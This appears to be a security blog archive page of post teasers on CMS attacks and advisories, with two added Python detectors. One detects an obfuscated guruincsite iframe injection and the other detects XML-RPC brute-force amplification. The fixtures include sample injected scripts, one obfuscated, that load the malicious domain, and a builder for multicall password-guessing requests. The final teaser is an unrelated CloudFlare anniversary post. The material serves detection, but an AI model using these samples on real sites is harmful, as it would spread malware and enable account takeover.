The Joomla team just released a new Joomla version (3.4.5) to fix some serious security vulnerabilities. The most critical one is a remote, unauthenticated SQL injection in the com_contenthistory component (included by default) that allows a full takeover of the vulnerable site. Directly from the Joomla announcement: Joomla! 3.4.5 is now available. […]
Archive | Security
Massive Magento Guruincsite Infection
We are currently seeing a massive attack on Magento sites where hackers inject malicious scripts that create iframes loading content from “guruincsite[.]com“. Google has already blacklisted about seven thousand sites because of this malware. There are two modifications of it. The first script is not obfuscated (Simple guruincsite script) and the second one is obfuscated (Obfuscated guruincsite script). The obfuscated […]
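The post describes the injected script in two forms, one plain and one obfuscated, both ending up with an iframe pointed at the guruincsite domain. The scanner below is an added example, not Sucuri's code or the malware itself: it normalizes a few common JavaScript string obfuscations (\x and \u escapes, String.fromCharCode, string concatenation) before looking for the domain and for iframe creation, so that a trivially encoded variant cannot slip past a plain grep. The obfuscation techniques it undoes are assumptions about what such a script might use, since the page does not show the obfuscated variant, and the sample page fragments are constructed for the example.

```python
import re
from typing import Dict

# Indicator taken from the post: iframes pointing at guruincsite[.]com (defanged there).
DOMAIN = "guruincsite.com"


def _decode_escapes(s: str) -> str:
    """Turn JS \\xNN and \\uNNNN escapes into the characters they encode."""
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return s


def _decode_fromcharcode(s: str) -> str:
    """Replace String.fromCharCode(103,117,...) with the quoted literal it builds."""
    def repl(m: "re.Match") -> str:
        codes = re.findall(r"\d+", m.group(1))
        return '"' + "".join(chr(int(c)) for c in codes) + '"'
    return re.sub(r"String\.fromCharCode\s*\(([^)]*)\)", repl, s)


def _join_concats(s: str) -> str:
    """Collapse "gur" + "uinc" + "site" into "guruincsite"."""
    return re.sub(r"[\"']\s*\+\s*[\"']", "", s)


def normalize(js: str) -> str:
    # A few passes so that one layer of encoding can expose the next.
    out = js
    for _ in range(3):
        out = _decode_escapes(out)
        out = _decode_fromcharcode(out)
        out = _join_concats(out)
    return out


def scan(page: str) -> Dict[str, object]:
    """Scan a page/script body for the guruincsite iframe injection."""
    norm = normalize(page)
    domain_hits = len(re.findall(re.escape(DOMAIN), norm, re.IGNORECASE))
    creates_iframe = bool(
        re.search(r"<iframe\b|createElement\s*\(\s*[\"']iframe[\"']", norm, re.IGNORECASE)
    )
    return {
        "domain_hits": domain_hits,
        "iframe": creates_iframe,
        "obfuscated": norm != page,          # something had to be decoded to see it
        "malicious": domain_hits > 0 and creates_iframe,
    }


# Constructed samples for the example (not captures from the campaign).
PLAIN = (
    "<script>var i=document.createElement('iframe');"
    "i.src='http://guruincsite.com/';document.body.appendChild(i);</script>"
)
OBFUSCATED = r"""<script>var d=String.fromCharCode(103,117,114,117,105,110,99,115,105,116,101)+"\x2e\x63\x6f\x6d";
var f=document.createElement("if"+"rame");f.src="http://"+d+"/";document.body.appendChild(f);</script>"""
CLEAN = "<script>document.getElementById('cart').innerHTML = 'Your cart is empty';</script>"

if __name__ == "__main__":
    for label, body in (("plain", PLAIN), ("obfuscated", OBFUSCATED), ("clean", CLEAN)):
        print(label, scan(body))
```

Run over a crawled copy of a site's HTML and theme/skin JavaScript; a hit with `obfuscated` set is the variant worth pulling apart by hand, since the normalizer only handles the simplest encodings and a packer will need a real JS interpreter or sandbox.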
Security Advisory: Stored XSS in Akismet WordPress Plugin
Security Risk: Dangerous
Exploitation Level: Easy/Remote
DREAD Score: 9/10
Vulnerability: Stored XSS
Patched Version: 3.1.5
During a routine audit for our WAF, we discovered a critical stored XSS vulnerability affecting Akismet, a popular WordPress plugin with millions of installs.
Vulnerability Disclosure Timeline:
October 2nd, 2015 – Bug discovered, initial report to Automattic security team
October 5th, 2015 […]
Redirect to Microsoft Word Macro Virus
These days we rarely see Microsoft Word malware on websites, but it still exists, and compromised websites can distribute this kind of malware as well: infected documents are not shared only as email attachments. For example, this malicious file was found on a hacked Joomla site by our analyst Krasimir Konov. This script […]
Brute Force Amplification Attacks Against WordPress XMLRPC
Brute Force attacks are one of the oldest and most common types of attacks that we still see on the Internet today. If you have a server online, it’s most likely being hit right now. It could be via protocols like SSH or FTP, and if it’s a web server, via web-based brute force attempts against […]
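The amplification the title refers to, in its commonly documented form, uses the XML-RPC `system.multicall` method to pack many credential-bearing calls (typically `wp.getUsersBlogs`, which takes a username and password) into a single HTTP request, so one POST can test hundreds of passwords. The excerpt above does not get that far, so treat that mechanism as an assumption of this added example, which is not Sucuri's code: it parses an XML-RPC request body, counts the inner calls that carry credentials, and flags a request that tries several distinct passwords for one account. The request builder and the credential list are constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Methods that accept username/password as their first two params (watchlist is an
# assumption for the example; extend it for the XML-RPC surface you expose).
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getCategories", "wp.getPosts", "metaWeblog.getUsersBlogs"}
MAX_AUTH_CALLS = 20  # more credential-bearing calls than this in one request is suspicious


def inner_calls(body: str) -> Tuple[str, List[Tuple[str, List[str]]]]:
    """Return the top-level method and, for system.multicall, the (name, params) of each inner call."""
    root = ET.fromstring(body)
    method = root.findtext("methodName") or ""
    calls: List[Tuple[str, List[str]]] = []
    if method != "system.multicall":
        return method, calls
    for struct in root.iterfind("./params/param/value/array/data/value/struct"):
        name, params = "", []
        for member in struct.findall("member"):
            key = member.findtext("name")
            if key == "methodName":
                name = member.findtext("value/string") or ""
            elif key == "params":
                params = [v.text or "" for v in member.findall("value/array/data/value/string")]
        calls.append((name, params))
    return method, calls


def analyze(body: str) -> Dict[str, object]:
    """Classify one XML-RPC request body as benign, a multicall, or brute-force amplification."""
    method, calls = inner_calls(body)
    auth = [(n, p) for n, p in calls if n in AUTH_METHODS and len(p) >= 2]
    usernames = {p[0] for _, p in auth}
    passwords = {p[1] for _, p in auth}
    if len(passwords) > 1 or len(auth) > MAX_AUTH_CALLS:
        verdict = "brute-force-amplification"
    elif method == "system.multicall":
        verdict = "multicall"
    else:
        verdict = "ok"
    return {
        "method": method,
        "inner_calls": len(calls),
        "auth_calls": len(auth),
        "distinct_users": len(usernames),
        "distinct_passwords": len(passwords),
        "verdict": verdict,
    }


def build_multicall(username: str, passwords: List[str]) -> str:
    """Construct the kind of request an amplified guesser sends (example data, not a capture)."""
    structs = "".join(
        "<value><struct>"
        "<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
        "<member><name>params</name><value><array><data>"
        f"<value><string>{username}</string></value><value><string>{pw}</string></value>"
        "</data></array></value></member>"
        "</struct></value>"
        for pw in passwords
    )
    return (
        "<?xml version='1.0'?><methodCall><methodName>system.multicall</methodName>"
        f"<params><param><value><array><data>{structs}</data></array></value></param></params>"
        "</methodCall>"
    )


# Constructed samples for the example.
GUESSES = ["password1", "123456", "letmein", "qwerty", "admin2015", "welcome"]
ATTACK = build_multicall("admin", GUESSES)
LEGIT = (
    "<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName>"
    "<params><param><value><string>admin</string></value></param>"
    "<param><value><string>s3cret</string></value></param></params></methodCall>"
)

if __name__ == "__main__":
    print(analyze(ATTACK))
    print(analyze(LEGIT))
```

The distinct-password check is the decisive signal: a legitimate client bundling several calls for one user reuses one password, while a guesser by definition varies it. Hook the function into whatever sees the request body before WordPress does (a WAF rule, a reverse-proxy filter), and remember that a single-call guesser still shows up in the web logs as many POSTs to xmlrpc.php, which this parser does not count across requests.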
Phishing for Anonymous Alligators
Everyone has encountered phishing at some point – fake emails and web pages designed to look legitimate. This tactic is becoming more popular as attackers learn how to produce new and convincing phishing lures. You might receive spam emails claiming to have some important document for you. Some of them have malicious attachments and […]
Security advisory: Stored XSS in Jetpack
Security Risk: Dangerous
Exploitation Level: Easy/Remote
DREAD Score: 8/10
Vulnerability: Stored XSS
Patched Version: 3.7.1
During a routine audit for our WAF, we discovered a critical stored XSS affecting the Jetpack WordPress plugin, one of the most popular plugins in the WordPress ecosystem.
Vulnerability Disclosure Timeline:
September 10th, 2015 – Initial report to Automattic security team […]
WordPress Malware – VisitorTracker Campaign Update
For the last three weeks we have been tracking a malware campaign that has been compromising thousands of WordPress sites with the VisitorTracker malware code. We initially posted some details about this issue in this blog post: WordPress Malware – Active VisitorTracker Campaign, but as the campaign and the malicious code have evolved, we decided to provide […]
Analyzing Black Hat URL Shorteners
Hackers are known to use URL shortening services to obfuscate their real landing pages. It’s very effective in clickbait scams on social networks. Some hackers think that using URL shorteners in site injections makes it less likely to be flagged as malicious because authorities cannot simply blacklist a link from bitly.com or goo.gl, so we […]
Happy 5th Birthday, CloudFlare!
CloudFlare customers recorded videos to celebrate our first five years.
Today is September 27, 2015. It’s a rare Super Blood Moon. And it’s also CloudFlare’s birthday. CloudFlare launched 5 years ago today. It was a Monday. While Michelle, Lee, and I had high expectations, we would never have imagined what’s happened since then. In the […]